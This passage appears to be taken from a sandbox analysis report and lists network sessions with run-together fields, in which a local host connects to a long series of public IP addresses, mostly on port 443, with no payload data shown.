                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18146192.168.2.233422695.192.192.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18147192.168.2.235507875.239.21.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18148192.168.2.2347462138.2.7.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18149192.168.2.2333334205.78.113.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18150192.168.2.234697262.71.83.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18151192.168.2.235126863.177.158.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18152192.168.2.234050040.94.101.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18153192.168.2.235576877.3.52.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18154192.168.2.234681051.178.159.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18155192.168.2.234045236.122.51.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18156192.168.2.2341304174.76.102.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18157192.168.2.233851420.141.95.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18158192.168.2.235321478.246.18.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18159192.168.2.2339238103.145.180.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18160192.168.2.234016681.68.235.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18161192.168.2.2340388174.67.78.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18162192.168.2.2341612157.120.88.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18163192.168.2.235294676.224.216.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18164192.168.2.2349126102.11.92.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18165192.168.2.2334904162.94.218.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18166192.168.2.233425846.228.75.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18167192.168.2.235784858.52.195.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18168192.168.2.235107660.204.101.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18169192.168.2.234251813.148.38.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18170192.168.2.2348380150.40.252.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18171192.168.2.2352190153.248.199.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18172192.168.2.2355530159.65.190.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18173192.168.2.234694854.179.210.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18174192.168.2.2359476204.57.30.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18175192.168.2.2343166122.30.24.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18176192.168.2.2359952152.74.159.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18177192.168.2.23373504.75.79.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18178192.168.2.234569297.106.184.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18179192.168.2.23368968.113.222.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18180192.168.2.2356152100.45.184.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18181192.168.2.2359348219.83.57.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18182192.168.2.234605694.168.146.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18183192.168.2.2349144143.155.63.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18184192.168.2.234358020.187.204.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18185192.168.2.2350558143.115.13.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18186192.168.2.234687268.193.136.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18187192.168.2.2356422137.101.83.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18188192.168.2.23593065.210.171.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18189192.168.2.234570820.177.96.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18190192.168.2.2334576120.252.135.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18191192.168.2.2333368184.156.103.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18192192.168.2.2342698133.49.76.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18193192.168.2.235114819.195.88.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18194192.168.2.234657099.109.100.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18195192.168.2.2345030223.184.131.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18196192.168.2.235168891.30.113.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18197192.168.2.2357036222.2.68.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18198192.168.2.2360120204.45.175.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18199192.168.2.2343668120.108.209.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18200192.168.2.2338088188.193.61.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18201192.168.2.2346678108.134.163.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18202192.168.2.233612685.200.20.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18203192.168.2.2336122150.51.163.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18204192.168.2.2358002222.48.18.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18205192.168.2.2358616187.186.7.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18206192.168.2.2343720219.178.75.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18207192.168.2.234757434.180.139.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18208192.168.2.235894678.87.176.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18209192.168.2.234109080.141.93.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18210192.168.2.2351276145.167.4.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18211192.168.2.2336264121.109.173.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18212192.168.2.234245863.59.226.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18213192.168.2.2336546114.58.45.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18214192.168.2.2333278212.240.87.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18215192.168.2.2351378191.177.26.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18216192.168.2.2333770164.163.214.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18217192.168.2.234630641.254.196.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18218192.168.2.234730095.130.110.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18219192.168.2.2354484105.76.48.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18220192.168.2.2357286203.150.73.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18221192.168.2.2348506114.227.40.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18222192.168.2.2333294133.99.214.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18223192.168.2.2357592209.133.51.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18224192.168.2.2346186103.77.198.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18225192.168.2.2343108110.181.51.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18226192.168.2.2351960118.104.104.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18227192.168.2.234029496.147.41.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18228192.168.2.234918634.145.255.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18229192.168.2.2336150169.178.83.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18230192.168.2.2337666192.252.194.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18231192.168.2.23412641.255.14.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18232192.168.2.2353570182.111.152.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18233192.168.2.236047858.56.180.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18234192.168.2.2350752157.7.103.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18235192.168.2.234749034.126.220.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18236192.168.2.2358932121.225.254.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18237192.168.2.233911899.70.230.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18238192.168.2.2356994105.238.111.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18239192.168.2.2338136133.249.13.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18240192.168.2.2348404182.132.89.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18241192.168.2.233959457.160.92.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18242192.168.2.23338522.88.130.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18243192.168.2.2358230144.6.157.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18244192.168.2.2354968220.135.158.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18245192.168.2.2343814104.70.180.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18246192.168.2.234013062.117.157.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18247192.168.2.2336962153.17.77.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18248192.168.2.235482060.167.54.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18249192.168.2.2349992111.25.42.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18250192.168.2.2335350126.133.82.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18251192.168.2.2357672188.131.95.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18252192.168.2.2346154178.210.152.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18253192.168.2.233533834.209.2.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18254192.168.2.2348762213.74.89.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18255192.168.2.2335072181.29.204.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18256192.168.2.2354826202.182.67.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18257192.168.2.2339360205.212.93.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18258192.168.2.2354704172.45.183.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18259192.168.2.2344850158.172.85.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18260192.168.2.23424502.213.15.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18261192.168.2.2346888144.33.198.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18262192.168.2.233423081.141.84.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18263192.168.2.234750451.187.163.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18264192.168.2.2341734217.128.212.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18265192.168.2.23500469.87.159.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18266192.168.2.234333696.54.222.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18267192.168.2.2339470216.216.205.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18268192.168.2.2338090146.194.213.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18269192.168.2.2337798114.157.146.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18270192.168.2.235161249.118.224.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18271192.168.2.235200079.151.228.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18272192.168.2.2346268186.6.34.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18273192.168.2.234548240.54.151.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18274192.168.2.2358248196.115.6.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18275192.168.2.2337688110.230.129.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18276192.168.2.2334020115.139.194.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18277192.168.2.235651864.39.165.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18278192.168.2.236097278.82.21.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18279192.168.2.233558870.72.118.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18280192.168.2.2360096177.182.78.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18281192.168.2.233494466.158.93.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18282192.168.2.235267639.53.108.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18283192.168.2.2346626112.135.166.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18284192.168.2.234812462.194.13.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18285192.168.2.234890081.171.105.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18286192.168.2.233311299.146.233.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18287192.168.2.2347692207.161.193.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18288192.168.2.2351618212.6.124.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18289192.168.2.2353180165.243.246.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18290192.168.2.2356148123.80.74.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18291192.168.2.2359450139.239.181.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18292192.168.2.2335002119.155.38.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18293192.168.2.2347384205.148.156.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18294192.168.2.2332974178.70.9.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18295192.168.2.235491027.189.218.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18296192.168.2.235679492.179.240.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18297192.168.2.235238614.73.203.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18298192.168.2.235128895.16.39.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18299192.168.2.234350842.37.3.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18300192.168.2.2339236110.183.212.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18301192.168.2.2356726132.115.223.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18302192.168.2.2348360177.83.153.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18303192.168.2.235881087.30.134.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18304192.168.2.2345208146.149.96.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18305192.168.2.234166896.67.249.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18306192.168.2.2351024172.10.234.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18307192.168.2.2348022163.15.166.638080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18308192.168.2.2339042223.205.131.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18309192.168.2.235515025.68.136.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18310192.168.2.2352662144.106.30.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18311192.168.2.2353150153.187.159.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18312192.168.2.234363661.123.219.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18313192.168.2.2355504118.238.8.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18314192.168.2.233714863.132.89.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18315192.168.2.2334954107.222.234.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18316192.168.2.234980682.59.186.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18317192.168.2.233441646.62.242.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18318192.168.2.233747285.12.83.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18319192.168.2.235854670.96.10.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18320192.168.2.2337008179.75.145.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18321192.168.2.2355672203.16.7.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18322192.168.2.2348248122.217.178.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18323192.168.2.2359730171.248.226.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18324192.168.2.2353168179.77.132.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18325192.168.2.2336720108.200.15.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18326192.168.2.2346612149.37.77.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18327192.168.2.2358086166.255.94.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18328192.168.2.2351190105.151.56.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18329192.168.2.2342012144.13.0.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18330192.168.2.233911090.152.246.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18331192.168.2.2353876104.50.222.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18332192.168.2.234243860.46.57.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18333192.168.2.2334336159.74.93.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18334192.168.2.2360916130.31.207.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18335192.168.2.2348976135.147.223.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18336192.168.2.2360526151.19.6.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18337192.168.2.234912251.170.51.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18338192.168.2.234101251.183.59.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18339192.168.2.233581840.116.140.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18340192.168.2.2335772223.107.41.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18341192.168.2.2340380139.197.210.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18342192.168.2.233765427.253.233.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18343192.168.2.2341412191.6.13.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18344192.168.2.235525682.28.120.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18345192.168.2.2341164203.4.152.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18346192.168.2.2358506141.1.36.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18347192.168.2.2336196175.121.138.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18348192.168.2.233491818.19.241.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18349192.168.2.235046665.174.207.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18350192.168.2.2351086183.32.50.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18351192.168.2.234533865.158.253.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18352192.168.2.2343774118.43.246.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18353192.168.2.2345684124.213.166.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18354192.168.2.233848436.183.255.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18355192.168.2.23549485.113.158.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18356192.168.2.234505446.245.193.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18357192.168.2.2344492207.21.196.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18358192.168.2.2344494113.120.207.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18359192.168.2.233802483.27.136.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18360192.168.2.235667852.191.158.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18361192.168.2.2348604221.246.168.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18362192.168.2.234177077.242.10.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18363192.168.2.2344630111.144.245.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18364192.168.2.233782688.113.176.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18365192.168.2.233650866.248.165.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18366192.168.2.234121012.8.225.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18367192.168.2.235138890.12.74.180443
